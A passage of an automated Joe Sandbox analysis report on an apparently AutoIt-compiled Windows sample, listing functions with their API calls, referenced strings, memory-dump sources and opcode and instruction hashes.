                                        • Opcode Fuzzy Hash: 060f427c3cbec99be2535618e46ede1a7391c513f3d70c489905815c26d86e08
                                        • Instruction Fuzzy Hash: 55917075A00244DFCB54DF59C484EAABBF1BF44704F1980A9E80AAF3A2C775ED85CB91
                                        Function 0009E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 0009E30D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: 3ec67c9bd4720bf50cd11c3e1000d12b91a3488037f7982aa0418d01c247471c
                                        • Instruction ID: c6869c860fa2340381353fbe9cd285fd9f0aed964e9b99d092213f93254b4650
                                        • Opcode Fuzzy Hash: 3ec67c9bd4720bf50cd11c3e1000d12b91a3488037f7982aa0418d01c247471c
                                        • Instruction Fuzzy Hash: B2515C61A0C242A6CF65F754CE053FE3BE4EB51740F34CD68E0D9422EAEB358DD1AA46
                                        Function 0008E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 120224b27ce7e87a67a5104db61422ee3d58ce5e6266d0730e773cca8dde7527
                                        • Instruction ID: 9d7f1dac37b51a871c4a08134f47b2d8315abbb0e25189e60c4b8187203e27bc
                                        • Opcode Fuzzy Hash: 120224b27ce7e87a67a5104db61422ee3d58ce5e6266d0730e773cca8dde7527
                                        • Instruction Fuzzy Hash: FD512435904286EFDF65EF68C481EFE7BE4EF25310F248159E8919B2D1DA349D42CB90
                                        Function 0008F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 0008F2A2
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0008F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: c3c5a7cd00fc71ff74b7a3c5693dc505709be5e63c65fa6ca0ce1e78d82de97d
                                        • Instruction ID: 3d45c860b752d95ddd92a2240586f50fcda2de22656bb10251bcc87065885da0
                                        • Opcode Fuzzy Hash: c3c5a7cd00fc71ff74b7a3c5693dc505709be5e63c65fa6ca0ce1e78d82de97d
                                        • Instruction Fuzzy Hash: 03515971808744ABD320AF10DC86BAFB7F8FB95340F81885CF1D9411A6EB758569CB6B
                                        Function 000F5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000F57E0
                                        • _wcslen.LIBCMT ref: 000F57EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        • Opcode ID: cc06e300e0f91a16f992b1d5e0677e1d2ed1ab50955dd0c0a6897db7cc7e3822
                                        • Instruction ID: 8ecc6490158760d7f8a42ca72d5bc73066f05bfb51246a369086ec630bd7110e
                                        • Opcode Fuzzy Hash: cc06e300e0f91a16f992b1d5e0677e1d2ed1ab50955dd0c0a6897db7cc7e3822
                                        • Instruction Fuzzy Hash: 3A41B271E002099FCB14DFA8C8818FEBBF5FF59351F204029E605A7292EB749D82DB90
                                        Function 000ED0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000ED130
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000ED13A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        • Opcode ID: f92c747ecaebd8e779f35a2c2bd46e205e41e3024b672015fbc15673f3f8b99a
                                        • Instruction ID: 3f1cf9dbc9b25c02f70f7437bbafd0c9c85e6036497af093f7aa918b5b30a1f1
                                        • Opcode Fuzzy Hash: f92c747ecaebd8e779f35a2c2bd46e205e41e3024b672015fbc15673f3f8b99a
                                        • Instruction Fuzzy Hash: 3B311971D00209AFCF15EFA5CC85AEEBFB9FF04300F004059F819A6162EB35AA46DB65
                                        Function 0010356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 00103621
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0010365C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: 9d05e732aee10ccd23734b3de8e9cfe3afc1ab7722cd5bf94ef8b00d0b90b8ca
                                        • Instruction ID: 840fc0160f3fc4494b32164be000c74be828b2625ac62b74cb683cbe3ed1f3ec
                                        • Opcode Fuzzy Hash: 9d05e732aee10ccd23734b3de8e9cfe3afc1ab7722cd5bf94ef8b00d0b90b8ca
                                        • Instruction Fuzzy Hash: A3318D71100604AEDB109F68DC80EFB73ADFF88720F109619F8A597290DBB1AD91DB60
                                        Function 00104537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0010461F
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00104634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: d7cdc70f0a27974843004747d20f9b7ae77c66228b539137f22bbefb1cccffa8
                                        • Instruction ID: 1d9048490b1218cdae4503f232692415bb1d1f777b4c8530339edb8fd8283ddd
                                        • Opcode Fuzzy Hash: d7cdc70f0a27974843004747d20f9b7ae77c66228b539137f22bbefb1cccffa8
                                        • Instruction Fuzzy Hash: E0312CB4A01309AFDF14CFA9C991BDA7BB5FF49300F144069EA45AB391E7B1A941CF90
                                        Function 001031EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0010327C
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00103287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 33d85aaf8d1ffdb55087c562a2eefaf7a58499ec1f503504d85bc5d0cfb434b2
                                        • Instruction ID: b878f8c82a0a22060747dd5b81e4b48100989cf5da1fab05eee7604f2679fb44
                                        • Opcode Fuzzy Hash: 33d85aaf8d1ffdb55087c562a2eefaf7a58499ec1f503504d85bc5d0cfb434b2
                                        • Instruction Fuzzy Hash: EE1190712002087FEF259F54DC81EFB376EEB983A4F104125F968972D1D7B19D5187A0
                                        Function 00103710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0007600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0007604C
                                          • Part of subcall function 0007600E: GetStockObject.GDI32(00000011), ref: 00076060
                                          • Part of subcall function 0007600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0007606A
                                        • GetWindowRect.USER32(00000000,?), ref: 0010377A
                                        • GetSysColor.USER32(00000012), ref: 00103794
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 3a2c8a8e84fde0b56be55a1b5effd73c446a01735937dd02d565e13b03b36603
                                        • Instruction ID: baf45ca97d1b580ba9723217598c7baf595033aa5e190d9666db670d722a1297
                                        • Opcode Fuzzy Hash: 3a2c8a8e84fde0b56be55a1b5effd73c446a01735937dd02d565e13b03b36603
                                        • Instruction Fuzzy Hash: B7113AB261020AAFDF01DFA8CC45EEA7BB8FF08354F004A15FDA5E2290D775E8519B90
                                        Function 000ECD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ECD7D
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ECDA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 29f96478f399e3288640b3ac7fd7bd0be21ab9e2df09ef831f2530853cf822d9
                                        • Instruction ID: 95c6aa88a74555fefa2c57a8c7f3c828613110229f727417419032897d954b4f
                                        • Opcode Fuzzy Hash: 29f96478f399e3288640b3ac7fd7bd0be21ab9e2df09ef831f2530853cf822d9
                                        • Instruction Fuzzy Hash: C511C671209671BEE7784B678C45EE7BEACEF127A4F004236B149A3080D7779842D6F0
                                        Function 00103429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 001034AB
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001034BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 721493c3daa174c8679a6174f9c5ec4e2433521d15ef635cbef6e1abf2d2033a
                                        • Instruction ID: 223b32fcf0d0683719ed75cbc2ad3b456d323d6161c002587df7d825201fc18e
                                        • Opcode Fuzzy Hash: 721493c3daa174c8679a6174f9c5ec4e2433521d15ef635cbef6e1abf2d2033a
                                        • Instruction Fuzzy Hash: 06116A71100208AAEB229F64DC84AEB376EEB15378F504724F9B5DB1E0C7B1DC919BA0
                                        Function 000D6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • CharUpperBuffW.USER32(?,?,?), ref: 000D6CB6
                                        • _wcslen.LIBCMT ref: 000D6CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: STOP
                                        • API String ID: 1256254125-2411985666
                                        • Opcode ID: 96809d0529e5f1b626a486f8d9b04b0a1bb52cbe3d566ac0fb6263eccecf1bbc
                                        • Instruction ID: 2cae5344bcdc90550ded5843b01748ef0219c8f4a069bc7ffb18cc536437c556
                                        • Opcode Fuzzy Hash: 96809d0529e5f1b626a486f8d9b04b0a1bb52cbe3d566ac0fb6263eccecf1bbc
                                        • Instruction Fuzzy Hash: B301C432A146268ACB219FBDDC819BF77E6EF61710B500526E85296291EB37D940C660
                                        Function 000D1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000D1D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 40115fb6e1d4b09fa1c1c3f98bf09781599d1edfdc4f09d393ef184c7192e67b
                                        • Instruction ID: 30bb543005d5e657fb1141a90fba1c130cb6fe33e2e7fc491f801d098aafe1ff
                                        • Opcode Fuzzy Hash: 40115fb6e1d4b09fa1c1c3f98bf09781599d1edfdc4f09d393ef184c7192e67b
                                        • Instruction Fuzzy Hash: E501D471A11318BBCB18EBA4CC52CFE73AAEB56350B04061AF866673C2EF3559088771
                                        Function 000D1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 000D1C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 59c23cf0148afb583607a4c263f0c09a43aa34cb3aa683cbcc429590410b3e8c
                                        • Instruction ID: c96ae080d353f82764f551c0f802c910c544a96354fa8536210bb005ea9d6211
                                        • Opcode Fuzzy Hash: 59c23cf0148afb583607a4c263f0c09a43aa34cb3aa683cbcc429590410b3e8c
                                        • Instruction Fuzzy Hash: 6C01A775B9120876DF14EB90CD52DFF77E99B11340F14101AA41667383EE249E0887B6
                                        Function 000D1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 000D1CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 2d53bfb77957c928bc5fc874beae904b0ae536842bf9b81cc068c59c5d987fa3
                                        • Instruction ID: fc01db479c33085ab163fc6b1938fcdb151a74d17d6477d6a1561e11873551bf
                                        • Opcode Fuzzy Hash: 2d53bfb77957c928bc5fc874beae904b0ae536842bf9b81cc068c59c5d987fa3
                                        • Instruction Fuzzy Hash: 5401A2B1B9021876CB14EBA0CA02EFE73E99B11340F541026B80673382EE659F0886B6
                                        Function 000D1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 000D1DD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 55c675f42c369b686c90a4e974f14b85b19753fc1c7d6a159e9b3d24f8827f38
                                        • Instruction ID: 5dab848ba17223ae205d55e2ddf1a70c3cb99814b3f5425f10fea77a306d5e52
                                        • Opcode Fuzzy Hash: 55c675f42c369b686c90a4e974f14b85b19753fc1c7d6a159e9b3d24f8827f38
                                        • Instruction Fuzzy Hash: EAF0FF71F503187ACB14E7A4CC52EFEB3A9AB12350F04091AB826633C2EF645A0882B5
                                        Function 000F747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: 3, 3, 16, 1
                                        • API String ID: 176396367-3042988571
                                        • Opcode ID: 3d5c97dd553277e01eed14d6d0929bcf82129878c6313d41f1bd5f8ec37f1143
                                        • Instruction ID: 3a0855bfe3f74175ee834da5ab6ee0ddb87c60ac7d8a66cecf150ed912cb524b
                                        • Opcode Fuzzy Hash: 3d5c97dd553277e01eed14d6d0929bcf82129878c6313d41f1bd5f8ec37f1143
                                        • Instruction Fuzzy Hash: 5BE02B022052241092712279ACC1DBF56C9DFC9750710182BFA89C22A7EB94DD92B3A2
                                        Function 000D0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000D0B23
                                        Strings
                                        Memory Dump Source
